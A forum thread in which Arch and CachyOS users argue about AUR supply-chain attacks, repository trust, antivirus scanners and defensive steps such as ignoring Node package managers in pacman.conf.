cachyos repos contain a lot of AUR packages, you are not safer if you install something that’s based on the AUR. I don’t think there are additional verifications before they update a package in the repo.
there should be a separate repo for AUR packages, something like cachyos-aur, cachyos repo should be reserved for distro maintained packages
Cachy repos packages have been compromised before as well. They just automate a lot of their builds as well from AUR with their optimizations so it can definitely happen.
This is what I was getting at with my statement. Good post 
Thinking you are smarter than bad actors or AI is precisely why this type of shit keeps happening lol
FOSS is a cesspool. You need to protect yourself.
This is an odd hill to die on for an exploit that’s specifically catchable via normal and recommended PKGBUILD inspection processes. Users still need to be the first and most important line of defense on top of technical measures.
The world is a cesspool. And security models generally suck.
That’s such a heavy drag for a performance oriented distro. Not a terrible idea, but even better would be an option for turning it on just while building and installing AUR packages, assuming built packages in the repos are already scanned and signed… you get the benefit with almost no downside so presumably better adoption.
Fortunately, my system is clean.
There seems to be another wave of attacks, this time using bun instead of npm.
Keep watching guys.
A good measure is what Fermin Olaiz suggested in the arch-general list:
Add
IgnorePkg = yarn bun pnpm npm nodejs-nopt node-gyp
to pacman.conf. And remove those packages from your system if they are installed. This should™️ prevent those attacks - until someone finds another vector.
For any and all exploits. It’s the truth and people here actually think they are 
Even more so in the FOSS compute world because accountability doesn’t really exist.
Not that’s how real time protection works or zero days. Also not sure what AV solution you’ve used lately that’s apparently a drag on performance. Modern ones usually have executable less than 100k and use next to no ram.
information and arguments here is all outdated but I enjoy it. I make a nice life in layer 7 security and incident response dealing specifically with Linux systems only and these arguments and attitudes are what paid for my very expensive SUV.
I just had a brilliant idea - why not just take a shortcut, contact the AUR maintainers and tell THEM to run ClamAV, then we can all sit back and relax, because it really was that simple…
Right?
No one said this but you being this triggered because your arguments don’t have a factor in corrent reality is nice. I am grateful for people like you. Have a blessed day.
Oh, ok. It wasn’t you that suggested we should all be running anti-virus scanners?
My bad, apparently.
You also failed, when requested, to issue a single example of success using such methods…
Not /usr/bin/brain?
maybe they run brain.exe in proton 
huh?
You literally recommended clamav in this very thread which specifically cites using 2-3+ GB RAM to load signatures into RAM. Fine enough but not by any stretch “next to no RAM” on an OS that requires only 3GB RAM.
If you’re not yet compromised, I’d say an even more prudent measure would be to discontinue updating anything until this has been fully resolved. The attacker has demonstrated changing the attack, and ignoring some packages will not prevent them from picking a new entry point in the future.
And even after this blows over, always review the pkgbuild for sus changes.
Clamav on average uses about a gig of ram. Not much on any modern computer, especially gaming. Other solutions like Crowdstrike and sentinelone for example are under the 100k and can be purchased on Amazon. Not sure where I said literally every av solution uses that little resources but as I said reading is hard. Have a blessed day.
Well, this is exactly what I wrote. Nevertheless, I think that proposed measure is a good second line of defense against the current attacks.
Definitely. There’s no question about it. That’s why I’ve repeatedly warned against using chaotic-aur.
Something useful: